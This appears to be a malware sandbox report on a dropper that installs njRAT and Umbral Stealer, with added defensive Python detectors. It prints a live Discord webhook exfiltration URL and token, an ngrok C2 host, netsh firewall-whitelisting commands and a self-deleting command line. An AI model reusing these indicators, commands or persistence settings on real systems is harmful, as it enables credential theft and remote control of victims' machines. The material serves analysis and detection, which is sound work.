
Windows Analysis Report
KvS2rT08PQ.exe

Overview

General Information

Sample name: KvS2rT08PQ.exe (renamed because the original name is a hash value)
Original sample name: 2784277bd68152abf75c6c6d59fab7af.exe
Analysis ID: 1429103
MD5: 2784277bd68152abf75c6c6d59fab7af
SHA1: e1d047c97e3bdfe273b215b42eccde32ca2ca63f
SHA256: 737bba8d3e9ad3e1526bf5949962af3b37107c80c767c473a820999eae507fbc
Tags: exe, njrat, RAT

Detection

Blank Grabber, Njrat, Umbral Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Blank Grabber
Yara detected Njrat
Yara detected Umbral Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to disable the Task Manager (.Net Source)
Contains functionality to spread to USB devices (.Net source)
Disables zone checking for all users
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • KvS2rT08PQ.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\KvS2rT08PQ.exe" MD5: 2784277BD68152ABF75C6C6D59FAB7AF)
    • Umbral.exe (PID: 2180 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: 774FA31E76AF56BBAD395E1E3AC68721)
      • WMIC.exe (PID: 7212 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 6264 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 3071F4F7B11A6BF6C623E83EED6D2418)
      • netsh.exe (PID: 7296 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7412 cmdline: netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7420 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ANDYzz-protected.exe (PID: 2736 cmdline: "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe" MD5: 33EB68C8C4FC521D64ED82219CDB19F2)
  • cleanup
Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware configuration (Njrat, extracted from 2.0.svchost.exe.e00000.0.unpack):
{"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "62b7d4736043995d94b02f8790cef504", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
Malware configuration (Umbral Stealer, extracted from 1.0.Umbral.exe.253f8f30000.0.unpack):
{"C2 url": "https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-", "Version": "v1.3"}
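The "Network Seprator" value above is what the njRAT client uses to join the fields of each message it sends to its server, and the Snort rule titles later in this report ("(ll)", "(inf)", "(act)") name the first field of those messages. The parser below is an added example, not code from the report or from Joe Sandbox: it splits a reassembled TCP stream into njRAT frames using that separator and labels each frame with the rule family it corresponds to. Two things are assumptions rather than facts stated on this page: that njRAT 0.7d frames a message as an ASCII decimal payload length, a NUL byte and then the payload (my recollection of the protocol, not something the report shows), and that the "ll"/"inf"/"act" tokens in the rule names are those first fields. The sample stream is constructed.

```python
"""njRAT-style message framing, parameterised by the separator from the
extracted configuration. Handles a trailing partial frame, the case a
stream reassembler hits whenever a read boundary falls inside a message."""

SEP = "|'|'|"   # "Network Seprator" value from the Njrat config in this report

# Assumption: these command tokens are the first field of the messages the
# correspondingly named Snort rules in this report fire on.
COMMANDS = {
    "ll":  "registration / keep-alive (ET 2033132)",
    "inf": "host information callback (ETPRO 2814856)",
    "act": "active window report (ETPRO 2814860 / 2825564)",
}


def build_frame(fields):
    """Encode one message as <decimal length><NUL><fields joined by SEP>.
    Assumed framing, used here only to construct the sample stream."""
    payload = SEP.join(fields).encode("utf-8")
    return str(len(payload)).encode("ascii") + b"\x00" + payload


def parse_frames(buf: bytes):
    """Split a stream into complete frames.

    Returns (frames, leftover). Each frame is (command, [other fields]);
    leftover is the unconsumed tail (an incomplete frame) to prepend to
    the next read from the socket or pcap."""
    frames = []
    while True:
        nul = buf.find(b"\x00")
        if nul == -1:
            break                                   # no complete length prefix yet
        head = buf[:nul]
        if not head.isdigit():
            raise ValueError(f"bad length prefix {head!r}")
        length = int(head)
        start = nul + 1
        if len(buf) - start < length:
            break                                   # payload not fully received
        fields = buf[start:start + length].decode("utf-8", "replace").split(SEP)
        frames.append((fields[0], fields[1:]))
        buf = buf[start + length:]
    return frames, buf


def triage(stream: bytes):
    """Label every complete frame with the rule family it maps to."""
    frames, leftover = parse_frames(stream)
    labelled = [(cmd, COMMANDS.get(cmd, "unknown command"), fields)
                for cmd, fields in frames]
    return labelled, leftover


# Constructed stream: two complete frames followed by the start of a third.
# The victim-id field reuses the campaign name "HacKed" seen in the config.
SAMPLE_STREAM = (
    build_frame(["ll", "HacKed_00000000", "0.7d", "Win 10"])
    + build_frame(["act", "Untitled - Notepad"])
    + b"40\x00inf" + SEP.encode("ascii") + b"part"   # truncated frame
)

if __name__ == "__main__":
    labelled, rest = triage(SAMPLE_STREAM)
    for cmd, label, fields in labelled:
        print(cmd, "->", label, fields)
    print("pending bytes:", rest)
```

Feeding the leftover bytes back in with the next chunk is what keeps the parser correct across read boundaries; a detector that drops the tail would silently miss the "inf" callback that starts there.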
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
C:\Users\user\AppData\Local\Temp\svchost.exe | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x115d2:$a1: get_Registry
  • 0x15a37:$a2: SEE_MASK_NOZONECHECKS
  • 0x156d9:$a3: Download ERROR
  • 0x15c89:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x13c16:$a5: netsh firewall delete allowedprogram "
C:\Users\user\AppData\Local\Temp\svchost.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0x15c89:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x137a2:$s1: winmgmts:\\.\root\SecurityCenter2
  • 0x156f7:$s3: Executed As
  • 0x124f0:$s5: Stub.exe
  • 0x156d9:$s6: Download ERROR
  • 0x13764:$s8: Select * From AntiVirusProduct
C:\Users\user\AppData\Local\Temp\svchost.exe | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x15a37:$reg: SEE_MASK_NOZONECHECKS
  • 0x156bd:$msg: Execute ERROR
  • 0x15711:$msg: Execute ERROR
  • 0x15c89:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\svchost.exe | MALWARE_Win_NjRAT | Detects NjRAT / Bladabindi | ditekSHen
  • 0x13c16:$s1: netsh firewall delete allowedprogram
  • 0x13c68:$s2: netsh firewall add allowedprogram
  • 0x15c89:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
  • 0x156bd:$s4: Execute ERROR
  • 0x15711:$s4: Execute ERROR
  • 0x156d9:$s5: Download ERROR
(4 further entries are collapsed in the original report)
Source | Rule | Description | Author | Strings
00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x113d2:$a1: get_Registry
  • 0x15837:$a2: SEE_MASK_NOZONECHECKS
  • 0x154d9:$a3: Download ERROR
  • 0x15a89:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x13a16:$a5: netsh firewall delete allowedprogram "
(11 further entries are collapsed in the original report)
Source | Rule | Description | Author | Strings
2.0.svchost.exe.e00000.0.unpack | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
2.0.svchost.exe.e00000.0.unpack | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x115d2:$a1: get_Registry
  • 0x15a37:$a2: SEE_MASK_NOZONECHECKS
  • 0x156d9:$a3: Download ERROR
  • 0x15c89:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x13c16:$a5: netsh firewall delete allowedprogram "
2.0.svchost.exe.e00000.0.unpack | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0x15c89:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x137a2:$s1: winmgmts:\\.\root\SecurityCenter2
  • 0x156f7:$s3: Executed As
  • 0x124f0:$s5: Stub.exe
  • 0x156d9:$s6: Download ERROR
  • 0x13764:$s8: Select * From AntiVirusProduct
2.0.svchost.exe.e00000.0.unpack | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x15a37:$reg: SEE_MASK_NOZONECHECKS
  • 0x156bd:$msg: Execute ERROR
  • 0x15711:$msg: Execute ERROR
  • 0x15c89:$ping: cmd.exe /c ping 0 -n 2 & del
2.0.svchost.exe.e00000.0.unpack | MALWARE_Win_NjRAT | Detects NjRAT / Bladabindi | ditekSHen
  • 0x13c16:$s1: netsh firewall delete allowedprogram
  • 0x13c68:$s2: netsh firewall add allowedprogram
  • 0x15c89:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
  • 0x156bd:$s4: Execute ERROR
  • 0x15711:$s4: Execute ERROR
  • 0x156d9:$s5: Download ERROR
(6 further entries are collapsed in the original report)

              System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\KvS2rT08PQ.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KvS2rT08PQ.exe", ParentImage: C:\Users\user\Desktop\KvS2rT08PQ.exe, ParentProcessId: 6500, ParentProcessName: KvS2rT08PQ.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 6264, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KvS2rT08PQ.exe", ParentImage: C:\Users\user\Desktop\KvS2rT08PQ.exe, ParentProcessId: 6500, ParentProcessName: KvS2rT08PQ.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 6264, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KvS2rT08PQ.exe", ParentImage: C:\Users\user\Desktop\KvS2rT08PQ.exe, ParentProcessId: 6500, ParentProcessName: KvS2rT08PQ.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 6264, ProcessName: svchost.exe
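The Sigma matches above and the process tree in the Classification section describe three host-level signals that survive the sample's attempt to hide as svchost.exe: a system binary name running from a user-writable directory, svchost.exe whose parent is not the service control manager, and the legacy `netsh firewall add allowedprogram` call that whitelists a Temp-directory binary. The code below is an added example, not part of the report or of the Sigma rules it cites; it implements those three checks over process-creation events constructed from the PIDs, paths and command lines listed in this report plus one benign baseline event. The allowlist of expected svchost.exe parents is an assumption about the monitored environment, not something the report states.

```python
"""Three process-level detections modelled on the Sigma hits in this report.
Events are constructed from the report's process tree (not real Sysmon logs)."""
import re
from dataclasses import dataclass

# Directories the genuine Windows system binaries run from.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
                "winlogon.exe", "conhost.exe", "smss.exe", "wininit.exe"}
# Assumption: only services.exe (and Defender's MsMpEng.exe) legitimately
# start svchost.exe in the monitored environment; tune per estate.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe"}
# Legacy netsh syntax exactly as it appears in the report's process tree.
NETSH_ADD = re.compile(
    r'netsh\s+firewall\s+add\s+allowedprogram\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def detect(ev: ProcEvent) -> list:
    """Return the names of the detections that fire for one event."""
    hits = []
    name = _basename(ev.image)
    if name in SYSTEM_NAMES and not _in_system_dir(ev.image):
        hits.append("system_process_name_in_unexpected_location")
    if name == "svchost.exe" and _basename(ev.parent_image) not in SVCHOST_PARENTS:
        hits.append("uncommon_svchost_parent")
    m = NETSH_ADD.search(ev.cmdline)
    if m:
        program = m.group(1) or m.group(2)         # quoted or bare path
        if not _in_system_dir(program):
            hits.append("netsh_allowedprogram_for_user_writable_path")
    return hits


def scan(events):
    """Map PID -> detections, omitting events that trigger nothing."""
    return {ev.pid: hits for ev in events if (hits := detect(ev))}


# Constructed events mirroring the report's tree (PIDs and paths as listed there).
EVENTS = [
    ProcEvent(6264, "C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe",
              '"C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe"',
              "C:\\Users\\user\\Desktop\\KvS2rT08PQ.exe"),
    ProcEvent(7296, "C:\\Windows\\System32\\netsh.exe",
              'netsh firewall add allowedprogram "C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe" "svchost.exe" ENABLE',
              "C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe"),
    ProcEvent(7232, "C:\\Windows\\System32\\conhost.exe",
              "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
              "C:\\Windows\\System32\\wbem\\WMIC.exe"),
    # Constructed benign baseline: the real svchost.exe started by services.exe.
    ProcEvent(1000, "C:\\Windows\\System32\\svchost.exe",
              "C:\\Windows\\System32\\svchost.exe -k netsvcs -p",
              "C:\\Windows\\System32\\services.exe"),
]

if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits)
```

The netsh check keys on the program path rather than on netsh.exe itself, which is why the legitimately located netsh.exe (PID 7296) still fires: the thing being allowlisted, not the tool doing it, is what is out of place.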
Timestamp                 SID      Src port  Dst port  Protocol  Classtype
04/20/24-21:33:31.352663  2033132  49750     19177     TCP       A Network Trojan was detected
04/20/24-21:35:42.023350  2814860  49758     19177     TCP       A Network Trojan was detected
04/20/24-21:35:32.786647  2814860  49757     19177     TCP       A Network Trojan was detected
04/20/24-21:32:07.714188  2825564  49740     19177     TCP       A Network Trojan was detected
04/20/24-21:33:38.270894  2033132  49751     19177     TCP       A Network Trojan was detected
04/20/24-21:32:26.030819  2814856  49747     19177     TCP       A Network Trojan was detected
04/20/24-21:34:13.358970  2825564  49753     19177     TCP       A Network Trojan was detected
04/20/24-21:32:02.183024  2033132  49737     19177     TCP       A Network Trojan was detected
04/20/24-21:32:04.631394  2033132  49740     19177     TCP       A Network Trojan was detected
04/20/24-21:32:25.822297  2033132  49747     19177     TCP       A Network Trojan was detected
04/20/24-21:35:55.347737  2033132  49759     19177     TCP       A Network Trojan was detected
04/20/24-21:32:56.770839  2033132  49749     19177     TCP       A Network Trojan was detected
04/20/24-21:33:38.479570  2814856  49751     19177     TCP       A Network Trojan was detected
04/20/24-21:33:56.027448  2814856  49752     19177     TCP       A Network Trojan was detected
04/20/24-21:35:55.555682  2814856  49759     19177     TCP       A Network Trojan was detected
04/20/24-21:35:39.113591  2033132  49758     19177     TCP       A Network Trojan was detected
04/20/24-21:34:08.564113  2814856  49753     19177     TCP       A Network Trojan was detected
04/20/24-21:32:04.839656  2814856  49740     19177     TCP       A Network Trojan was detected
04/20/24-21:35:55.890076  2825564  49759     19177     TCP       A Network Trojan was detected
04/20/24-21:33:31.560459  2814856  49750     19177     TCP       A Network Trojan was detected
04/20/24-21:36:07.123314  2814856  49760     19177     TCP       A Network Trojan was detected
04/20/24-21:34:42.913707  2033132  49754     19177     TCP       A Network Trojan was detected
04/20/24-21:32:57.578337  2814860  49749     19177     TCP       A Network Trojan was detected
04/20/24-21:35:20.785425  2033132  49756     19177     TCP       A Network Trojan was detected
04/20/24-21:35:17.370363  2033132  49755     19177     TCP       A Network Trojan was detected
04/20/24-21:35:27.123609  2033132  49757     19177     TCP       A Network Trojan was detected
04/20/24-21:35:55.890076  2814860  49759     19177     TCP       A Network Trojan was detected
04/20/24-21:34:43.124036  2814856  49754     19177     TCP       A Network Trojan was detected
04/20/24-21:36:06.912000  2033132  49760     19177     TCP       A Network Trojan was detected
04/20/24-21:32:07.714188  2814860  49740     19177     TCP       A Network Trojan was detected
04/20/24-21:35:17.579185  2814856  49755     19177     TCP       A Network Trojan was detected
04/20/24-21:32:57.578337  2825564  49749     19177     TCP       A Network Trojan was detected
04/20/24-21:35:20.991740  2814856  49756     19177     TCP       A Network Trojan was detected
04/20/24-21:35:42.023350  2825564  49758     19177     TCP       A Network Trojan was detected
04/20/24-21:32:02.391022  2814856  49737     19177     TCP       A Network Trojan was detected
04/20/24-21:34:13.358970  2814860  49753     19177     TCP       A Network Trojan was detected
04/20/24-21:35:27.332080  2814856  49757     19177     TCP       A Network Trojan was detected
04/20/24-21:35:32.786647  2825564  49757     19177     TCP       A Network Trojan was detected
04/20/24-21:32:56.978717  2814856  49749     19177     TCP       A Network Trojan was detected
04/20/24-21:33:55.819529  2033132  49752     19177     TCP       A Network Trojan was detected
04/20/24-21:34:08.350949  2033132  49753     19177     TCP       A Network Trojan was detected
04/20/24-21:35:39.323225  2814856  49758     19177     TCP       A Network Trojan was detected


              AV Detection

Source: KvS2rT08PQ.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Avira: detection malicious, Label: TR/Redcap.pwthy
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 1.0.Umbral.exe.253f8f30000.0.unpack | Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-", "Version": "v1.3"}
Source: 2.0.svchost.exe.e00000.0.unpack | Malware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "62b7d4736043995d94b02f8790cef504", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
Source: 0.tcp.eu.ngrok.io | Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Virustotal: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Virustotal: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Virustotal: Detection: 77%
Source: KvS2rT08PQ.exe | ReversingLabs: Detection: 68%
Source: KvS2rT08PQ.exe | Virustotal: Detection: 71%
Source: Yara match | File source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Joe Sandbox ML: detected
Source: KvS2rT08PQ.exe | Joe Sandbox ML: detected
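The Umbral Stealer configuration extracted above uses a Discord webhook as its exfiltration endpoint, so the only attacker-controlled indicators are the webhook ID and token. As an added example (not part of the report or of Joe Sandbox), the helper below pulls webhook URLs out of a blob of memory strings, separates ID from token, produces a defanged form for sharing, and decodes the ID as a Discord snowflake to estimate when the webhook was created. The snowflake layout (bits 22 and above are milliseconds since 2015-01-01 UTC) is Discord's documented format; the string blob is constructed around the URL from this report.

```python
"""Triage of Discord webhook C2 URLs found in memory strings or configs."""
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1420070400000          # 2015-01-01T00:00:00Z, per Discord docs
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]+)")


def snowflake_time(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake (webhook, message, user IDs)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def defang(url: str) -> str:
    """Make the URL safe to paste into a ticket without it becoming a live link."""
    scheme, rest = url.split("://", 1)
    host, path = rest.split("/", 1)
    return f"hxx{scheme[-2:]}://{host.replace('.', '[.]')}/{path}"


def extract_webhooks(blob: str):
    """Return one record per distinct webhook URL found in the text."""
    seen, out = set(), []
    for m in WEBHOOK_RE.finditer(blob):
        url, webhook_id, token = m.group(0), m.group(1), m.group(2)
        if url in seen:
            continue
        seen.add(url)
        out.append({
            "url": url,
            "defanged": defang(url),
            "webhook_id": webhook_id,
            "token": token,
            "created_utc": snowflake_time(int(webhook_id)).isoformat(timespec="seconds"),
        })
    return out


# Constructed strings output surrounding the URL from this report's Umbral config.
SAMPLE_STRINGS = "\n".join([
    "Version v1.3",
    "https://discord.com/api/webhooks/1225910337656590376/"
    "EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-",
    "https://discord.com/api/webhooks/1225910337656590376/"
    "EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-",  # duplicate string
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
])

if __name__ == "__main__":
    for hook in extract_webhooks(SAMPLE_STRINGS):
        print(hook["defanged"], "id", hook["webhook_id"], "created", hook["created_utc"])
```

The creation timestamp is useful for scoping: a webhook minted days before the sample was analysed tells you how old the campaign infrastructure is, and the ID/token pair is what to hand to Discord's abuse channel.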
Source: KvS2rT08PQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: KvS2rT08PQ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: !costura.discordrpc.pdb.compressed | source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.discordrpc.pdb.compressed|||DiscordRPC.pdb|447C1853EECA30637A94415F07CA7CD3E384746B|27868 | source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed | source: ANDYzz-protected.exe.0.dr
Source: Binary string: costura.costura.pdb.compressed | source: ANDYzz-protected.exe.0.dr
Source: Binary string: 8costura.hardcodet.wpf.taskbarnotification.pdb.compressed | source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 | source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed|||Hardcodet.Wpf.TaskbarNotification.pdb|0FF074905FAAB506531D68962300EAF21DAF3B05|97792 | source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
